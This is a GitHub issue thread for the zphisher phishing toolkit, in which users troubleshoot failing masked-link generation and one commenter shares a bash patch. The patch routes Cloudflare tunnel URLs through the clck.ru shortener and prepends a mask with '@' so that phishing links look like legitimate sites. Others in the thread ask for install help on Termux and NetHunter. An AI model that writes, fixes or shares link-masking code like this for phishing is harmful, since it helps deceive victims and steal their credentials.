htr-tech / zphisher

An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !
GNU General Public License v3.0
11.21k stars 3.72k forks source link

can't seem to have url 2 and 3 working #899

Open drackosters opened 3 months ago

drackosters commented 3 months ago

Which environment you are using ?

Linux / Desktop

Describe the bug

image

Provide log output [Optional]

No response

drackosters commented 3 months ago

does any one knows where to find the cloudflare key that's linked to this program ?

drackosters commented 3 months ago

*token

drackosters commented 3 months ago

k i found out why it doesn't work the trycloudflare.com is banned on every url shortener sites so a url 2 can't be generated at all image

drackosters commented 3 months ago

@htr-tech can you fix that or tell me how to change that in the code.

drackosters commented 3 months ago

fixed it image

ym-sindhu commented 3 months ago

kindly share how u fixed it. I''m having the same problem : URL#1 is not showing and URL#2 is showing till the "@" and the rest of the link is not showing. photo_5767055865302598876_y

drackosters commented 3 months ago

kindly share how u fixed it. I''m having the same problem : URL#1 is not showing and URL#2 is showing till the "@" and the rest of the link is not showing. photo_5767055865302598876_y

Try the fork i made https://github.com/dracksters/zphisher

ym-sindhu commented 3 months ago

i'm new to termux and can't figure out which command to use to install your version on termux android. could u please guide me a bit

$  pkg install tur-repo
$ pkg install zphisher
$ zphisher

this is how i installed it

drackosters commented 3 months ago

i'm new to termux and can't figure out which command to use to install your version on termux android. could u please guide me a bit

$  pkg install tur-repo
$ pkg install zphisher
$ zphisher

this is how i installed it

Can't really help with that i installed Ubuntu on termux and used the Ubuntu commands

ym-sindhu commented 3 months ago

oh alright understood. i installed it on nethunter and its working fine now thnx

drackosters commented 3 months ago

oh alright understood. i installed it on nethunter and its working fine now thnx

👍

XCFDVNIVFD commented 1 month ago

I have the same problem, I don't understand why the link I put becomes the 3 links Capture d'écran 2024-08-07 032216 pls help me @drackosters

drackosters commented 1 month ago

I have the same problem, I don't understand why the link I put becomes the 3 links Capture d'écran 2024-08-07 032216 pls help me @drackosters

modify the code and replace it with this i'm pretty sure that's all i did.

drackosters commented 1 month ago

shorten() { local long_url=$1 local short_url=$(curl -s "https://clck.ru/--?url=$long_url") processed_url=${short_url#https://} # Remove the leading https:// echo "Shortened URL: $processed_url" echo "$processed_url" >> shortened_urls.txt }

custom_url() { url=${1#http*//} clck_ru="https://clck.ru/--"

{ custom_mask; sleep 1; clear; banner_small; }
if [[ ${url} =~ [-a-zA-Z0-9.]*(trycloudflare.com|loclx.io) ]]; then
    shorten "$url"
    processed_url=${processed_url%\"} # Remove trailing quote
    processed_url=${processed_url#\"} # Remove leading quote
    masked_url="$mask@$processed_url"
else
    url="Unable to generate links. Try after turning on hotspot"
    processed_url="Unable to Short URL"
fi

echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}$url"
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${ORANGE}$processed_url"
[[ $processed_url != *"Unable"* ]] && echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 3 : ${ORANGE}$masked_url"

}

drackosters commented 1 month ago

You Can check the rep on my alt @dracksters

XCFDVNIVFD commented 1 month ago

thanks, but i have to modify the code in which folder pls @drackosters

drackosters commented 1 month ago

Zphisher.sh IS the only file you need to change for the URL shortner

All-Might2004 commented 1 week ago

You Can check the rep on my alt @dracksters

Checked it but it doesn't even generate the original link. It says " couldn't generate link. Try turning on hotspot"

drackosters commented 1 week ago

You Can check the rep on my alt @dracksters

Checked it but it doesn't even generate the original link. It says " couldn't generate link. Try turning on hotspot"

I know i changed the link since i didn't need it anymore

All-Might2004 commented 1 week ago

You Can check the rep on my alt @dracksters

Checked it but it doesn't even generate the original link. It says " couldn't generate link. Try turning on hotspot"

I know i changed the link since i didn't need it anymore

Damn. Please can put it up again?